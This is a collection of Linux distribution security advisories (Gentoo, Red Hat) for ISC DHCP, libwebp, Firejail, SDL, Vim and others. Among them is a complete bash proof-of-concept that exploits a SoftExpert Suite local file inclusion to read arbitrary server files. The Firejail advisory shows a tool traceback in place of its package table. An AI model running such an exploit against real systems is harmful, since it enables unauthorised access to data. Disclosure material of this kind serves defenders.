Gentoo Linux Security Advisory 202305-22 - Multiple vulnerabilities have been discovered in ISC DHCP, the worst of which could result in denial of service. Versions less than 4.4.3_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-22  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: ISC DHCP: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #875521, #792324  
       ID: 202305-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in ISC DHCP, the worst of  
which could result in denial of service.

Background  
==========

ISC DHCP is ISC's reference implementation of all aspects of the Dynamic  
Host Configuration Protocol.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-misc/dhcp              < 4.4.3_p1                >= 4.4.3_p1

Description  
===========

Multiple vulnerabilities have been discovered in ISC DHCP. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All ISC DHCP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.4.3_p1"

References  
==========

[ 1 ] CVE-2021-25217  
      https://nvd.nist.gov/vuln/detail/CVE-2021-25217  
[ 2 ] CVE-2022-2928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2928  
[ 3 ] CVE-2022-2929  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2929

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-22

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-22

Red Hat Security Advisory 2023-2085-01 - The libwebp packages provide a library and tools for the WebP graphics format. WebP is an image format with a lossy compression of digital photographic images. WebP consists of a codec based on the VP8 format, and a container based on the Resource Interchange File Format. Webmasters, web developers and browser developers can use WebP to compress, archive, and distribute digital images more efficiently. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libwebp security update  
Advisory ID:       RHSA-2023:2085-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2085  
Issue date:        2023-05-02  
CVE Names:         CVE-2023-1999   
=====================================================================

1. Summary:

An update for libwebp is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libwebp packages provide a library and tools for the WebP graphics  
format. WebP is an image format with a lossy compression of digital  
photographic images. WebP consists of a codec based on the VP8 format, and  
a container based on the Resource Interchange File Format (RIFF).  
Webmasters, web developers and browser developers can use WebP to compress,  
archive, and distribute digital images more efficiently.

Security Fix(es):

* Mozilla: libwebp: Double-free in libwebp (CVE-2023-1999)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2186102 - CVE-2023-1999 Mozilla: libwebp: Double-free in libwebp

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
libwebp-1.0.0-7.el8_6.src.rpm

aarch64:  
libwebp-1.0.0-7.el8_6.aarch64.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.aarch64.rpm  
libwebp-debugsource-1.0.0-7.el8_6.aarch64.rpm  
libwebp-devel-1.0.0-7.el8_6.aarch64.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.aarch64.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.aarch64.rpm

ppc64le:  
libwebp-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-debugsource-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-devel-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.ppc64le.rpm

s390x:  
libwebp-1.0.0-7.el8_6.s390x.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.s390x.rpm  
libwebp-debugsource-1.0.0-7.el8_6.s390x.rpm  
libwebp-devel-1.0.0-7.el8_6.s390x.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.s390x.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.s390x.rpm

x86_64:  
libwebp-1.0.0-7.el8_6.i686.rpm  
libwebp-1.0.0-7.el8_6.x86_64.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.x86_64.rpm  
libwebp-debugsource-1.0.0-7.el8_6.i686.rpm  
libwebp-debugsource-1.0.0-7.el8_6.x86_64.rpm  
libwebp-devel-1.0.0-7.el8_6.i686.rpm  
libwebp-devel-1.0.0-7.el8_6.x86_64.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.x86_64.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1999  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFFOytzjgjWX9erEAQjyYA/+KUlMr2KE0I5leb2eOOEg4K4d8Fhk8mnr  
Pj8mhOIbKOjKfLOC6O92zhbx7hDJ+Fra+eXcr7N85EqKmEnbupCsoZbaTm4acSu2  
fvae6RqwhpbXhrnKqLPOw8hvHU46LZNwnz1JbohfeUy5p7LIc4khiPum43NkLOjO  
VtGEt0uTf2zwfYNLuRltImNeURcVx8TTHgdxQ5fQzaIjAZ+mAlwTspSVOLt/bvn4  
A+OTv01DkBl2ZJtJ/Cxm0FxnvxR8yCSkRXKpNQreWWulRNFvDQWTqVclKeQOrBHG  
UI22nJRWcv97dTNEn9K/c4kD4jZSM2cwr35gLemzTufQbk4YqC3eYTc1AXl/8erj  
X861SK5GhIzHBCvPSPSZo/bjeAh33r5DRCURxOI8Ai/AQbVF706mO65ZNLd4oDux  
I2w5gSq3u8ryp8lQ+EuACX8CunKOpJ0C+sXZFofwKfjr3pRb0JAaPor2dUp/zSod  
m31NChEfVIhuKbfzBjtrx77TebzV25KqxkpDXqDbv/3RrWzkUOMlT9CXR3VRZ1/C  
pnO5TVCihZ6nJHh/m8hudZzNTAObvl1dem1MJ1Q0S2RuOw5cWXYIeNjHYz0obBMt  
tnq6C5p9Mjx3BFgdpgazb8FzpxGPyywuKq4Wfg2CIS8VW4N/UhkfiTJa72WT1sQk  
CGORhg1nqdE=  
=Yvw1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2085-01

Gentoo Linux Security Advisory 202305-20 - A buffer overflow vulnerability has been discovered in libapreq2 which could result in denial of service. Versions less than 2.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: libapreq2: Buffer Overflow  
     Date: May 03, 2023  
     Bugs: #866536  
       ID: 202305-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A buffer overflow vulnerability has been discovered in libapreq2 which  
could result in denial of service.

Background  
==========

libapreq is a shared library with associated modules for manipulating  
client request data via the Apache API.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-apache/libapreq2       < 2.17                        >= 2.17

Description  
===========

TODO

Impact  
======

An attacker could submit a crafted multipart form to trigger the buffer  
overflow and cause a denial of service.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libapreq2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apache/libapreq2-2.17"

References  
==========

[ 1 ] CVE-2022-22728  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22728

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-20

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

Gentoo Linux Security Advisory 202305-19 - A vulnerability has been discovered in Firejail which could result in local root privilege escalation.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Firejail: Local Privilege Escalation  
     Date: May 03, 2023  
     Bugs: #850748  
       ID: 202305-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Firejail which could result in  
local root privilege escalation.

Background  
==========

A SUID program that reduces the risk of security breaches by restricting  
the running environment of untrusted applications using Linux namespaces  
and seccomp-bpf.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
Traceback (most recent call last):  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 326, in generate_mail_table  
    return self._generate_mail_table()  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 297, in _generate_mail_table  
    vuln.range_types_rev[vuln.pkg_range], vuln.version  
KeyError: None

Description  
===========

Firejail does not sufficiently validate the user's environment prior to  
using it as the root user when using the --join command line option.

Impact  
======

An unprivileged user can exploit this vulnerability to achieve local  
root privileges.

Workaround  
==========

System administrators can mitigate this vulnerability via adding either  
"force-nonewprivs yes" or "join no" to the Firejail configuration file  
in /etc/firejail/firejail.config.

Resolution  
==========

Gentoo has discontinued support for sys-apps/firejail-lts. Users should  
unmerge it in favor of sys-apps/firejail:

  # emerge --ask --depclean --verbose "sys-apps/firejail-lts"  
  # emerge --ask --verbose "sys-apps/firejail"

All Firejail users should upgrade to the latest version:

  # emerge --ask --oneshot --verbose ">=sys-apps/firejail-0.9.70"

References  
==========

[ 1 ] CVE-2022-31214  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31214

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-19

Gentoo Linux Security Advisory 202305-18 - Multiple vulnerabilities have been found in libsdl2, the worst of which could result in arbitrary code execution. Versions less than 2.26.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libsdl2: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #836665, #890614  
       ID: 202305-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in libsdl2, the worst of which  
could result in arbitrary code execution.

Background  
==========

Simple DirectMedia Layer is a cross-platform development library  
designed to provide low level access to audio, keyboard, mouse,  
joystick, and graphics hardware via OpenGL and Direct3D.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libsdl2         < 2.26.0                    >= 2.26.0

Description  
===========

Multiple vulnerabilities have been discovered in libsdl2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libsdl2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libsdl2-2.26.0"

References  
==========

[ 1 ] CVE-2021-33657  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33657  
[ 2 ] CVE-2022-4743  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4743

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-18

Gentoo Linux Security Advisory 202305-17 - Multiple vulnerabilities have been found in libsdl, the worst of which could result in arbitrary code execution. Versions less than 1.2.15_p20221201>= are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libsdl: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #692388, #836665, #861809  
       ID: 202305-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in libsdl, the worst of which  
could result in arbitrary code execution.

Background  
==========

Simple DirectMedia Layer is a cross-platform development library  
designed to provide low level access to audio, keyboard, mouse,  
joystick, and graphics hardware via OpenGL and Direct3D.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libsdl          < 1.2.15_p20221201>= 1.2.15_p20221201

Description  
===========

Multiple vulnerabilities have been discovered in SDL. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libsdl users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libsdl-1.2.15_p20221201"

References  
==========

[ 1 ] CVE-2019-7572  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7572  
[ 2 ] CVE-2019-7573  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7573  
[ 3 ] CVE-2019-7574  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7574  
[ 4 ] CVE-2019-7575  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7575  
[ 5 ] CVE-2019-7576  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7576  
[ 6 ] CVE-2019-7577  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7577  
[ 7 ] CVE-2019-7578  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7578  
[ 8 ] CVE-2019-7635  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7635  
[ 9 ] CVE-2019-7636  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7636  
[ 10 ] CVE-2019-7638  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7638  
[ 11 ] CVE-2019-13616  
      https://nvd.nist.gov/vuln/detail/CVE-2019-13616  
[ 12 ] CVE-2021-33657  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33657  
[ 13 ] CVE-2022-34568  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34568

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-17

Gentoo Linux Security Advisory 202305-16 - Multiple vulnerabilities have been found in Vim, the worst of which could result in denial of service. Versions less than 9.0.1157 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Vim, gVim: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #851231, #861092, #869359, #879257, #883681, #889730  
       ID: 202305-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Vim, the worst of which  
could result in denial of service.

Background  
==========

Vim is an efficient, highly configurable improved version of the classic  
‘vi’ text editor. gVim is the GUI version of Vim.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-editors/gvim           < 9.0.1157                >= 9.0.1157  
  2  app-editors/vim            < 9.0.1157                >= 9.0.1157  
  3  app-editors/vim-core       < 9.0.1157                >= 9.0.1157

Description  
===========

Multiple vulnerabilities have been discovered in Vim, gVim. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Vim users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/vim-9.0.1157"

All gVim users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/gvim-9.0.1157"

All vim-core users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/vim-core-9.0.1157"

References  
==========

[ 1 ] CVE-2022-1154  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1154  
[ 2 ] CVE-2022-1160  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1160  
[ 3 ] CVE-2022-1381  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1381  
[ 4 ] CVE-2022-1420  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1420  
[ 5 ] CVE-2022-1616  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1616  
[ 6 ] CVE-2022-1619  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1619  
[ 7 ] CVE-2022-1620  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1620  
[ 8 ] CVE-2022-1621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1621  
[ 9 ] CVE-2022-1629  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1629  
[ 10 ] CVE-2022-1674  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1674  
[ 11 ] CVE-2022-1720  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1720  
[ 12 ] CVE-2022-1725  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1725  
[ 13 ] CVE-2022-1733  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1733  
[ 14 ] CVE-2022-1735  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1735  
[ 15 ] CVE-2022-1769  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1769  
[ 16 ] CVE-2022-1771  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1771  
[ 17 ] CVE-2022-1785  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1785  
[ 18 ] CVE-2022-1796  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1796  
[ 19 ] CVE-2022-1851  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1851  
[ 20 ] CVE-2022-1886  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1886  
[ 21 ] CVE-2022-1897  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1897  
[ 22 ] CVE-2022-1898  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1898  
[ 23 ] CVE-2022-1927  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1927  
[ 24 ] CVE-2022-1942  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1942  
[ 25 ] CVE-2022-1968  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1968  
[ 26 ] CVE-2022-2000  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2000  
[ 27 ] CVE-2022-2042  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2042  
[ 28 ] CVE-2022-2124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2124  
[ 29 ] CVE-2022-2125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2125  
[ 30 ] CVE-2022-2126  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2126  
[ 31 ] CVE-2022-2129  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2129  
[ 32 ] CVE-2022-2175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2175  
[ 33 ] CVE-2022-2182  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2182  
[ 34 ] CVE-2022-2183  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2183  
[ 35 ] CVE-2022-2206  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2206  
[ 36 ] CVE-2022-2207  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2207  
[ 37 ] CVE-2022-2208  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2208  
[ 38 ] CVE-2022-2210  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2210  
[ 39 ] CVE-2022-2231  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2231  
[ 40 ] CVE-2022-2257  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2257  
[ 41 ] CVE-2022-2264  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2264  
[ 42 ] CVE-2022-2284  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2284  
[ 43 ] CVE-2022-2285  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2285  
[ 44 ] CVE-2022-2286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2286  
[ 45 ] CVE-2022-2287  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2287  
[ 46 ] CVE-2022-2288  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2288  
[ 47 ] CVE-2022-2289  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2289  
[ 48 ] CVE-2022-2304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2304  
[ 49 ] CVE-2022-2343  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2343  
